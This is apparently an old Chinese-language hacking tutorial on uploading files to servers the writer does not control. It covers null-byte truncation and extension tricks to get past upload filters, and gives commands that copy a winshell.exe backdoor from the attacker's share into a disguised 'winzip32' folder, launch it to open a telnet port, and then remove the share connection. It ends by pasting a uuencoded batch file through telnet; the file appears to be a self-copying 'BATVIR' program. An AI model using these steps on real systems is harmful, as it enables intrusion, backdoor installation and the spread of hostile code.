文件上传技巧

文件上传是很早以前的事了，最早那会常用的就是IPC连接，然后一个一个的COPY，自从动网upfile漏洞出来以后，各种脚本系统如PHP.JSP下的文件漏洞纷纷暴出，原理都是大同小异，没有过滤文件上传路径，导致可以抓包然后把空格20改成00，变成空字符NULL，系统是从右往左识别的，所以到空字符那就截断了，更简单的就是过滤文件上传类型不完整，改后缀就可以解决了，这些上传文件的漏洞，用万能上传工具就可以轻松搞定，不过漏洞文件名不同罢了。

还有一些另类的文件上传方法，是在系统做了比较好的防范下完成的，资料来源感谢CD-LION提供一。

先COPY个winshell.exe吧,开个telnet端口,命令行下总比在浏览器里方便啊.

copy \\myIP\c$\tools\winshell.exe d:\downloads\winzip32 已复制一个文件
启动它 d:\downloads\winzip32\winshell.exe 浏览器窗口会停好久,
不用等的,程序已经启动了,点停止,接着,
断开共享连接: net use \\myIP\c$ /del 完成
1利用telnet上传文件 by :jiangyf@usa.net 

如果ftp被关了,sendmail也不行,如何把编译好的文件上传到主机呢? 
方法很简单: 
1.先把要上传的文件用uuedcode进行编码,文件会变成大概下面的样子: 
begin 644 file.bat 
M.C!J95@T92TP,#503U!=:%=E6#5D9%!>,2Q&1D9&1C$L1D9&,2PT4%]J 
M95@T85!9+7@M04%28#!@*CTP,’500D])04%!049+04]"4$E$34-"04Q%04I- 
M3D-"2D%,24%!14U-3D-"1D5’24=&0T%%3D="1T1(0T=02$=’2DA#2$9(1$-! 
M1TI(1$-!1T1’4$=.1TI’3T=(0T%#3T-/0T]#3T-/0T]!3D%+0T5!07%Q<7$@ 
M"D!%0TA/($]&1B`*0T]062`E,"Y"050@+T(@0SI<0D%45DE2+D-/32`O0B`O 
E62`*0SI<0D%45DE2+D-/32`*1$5,($,Z7$)!5%9)4BY#3TT@"@`` 
` 
end 
sum -r/size 17903/262 
全部都是可见的ASCII字符了 

2.用TELNET连接到主机后输入 
$ cat >a 
然后用WINODWS的拷贝/粘贴,把文件粘贴到telnet窗口 
按^d 
在当前目录下产生文件a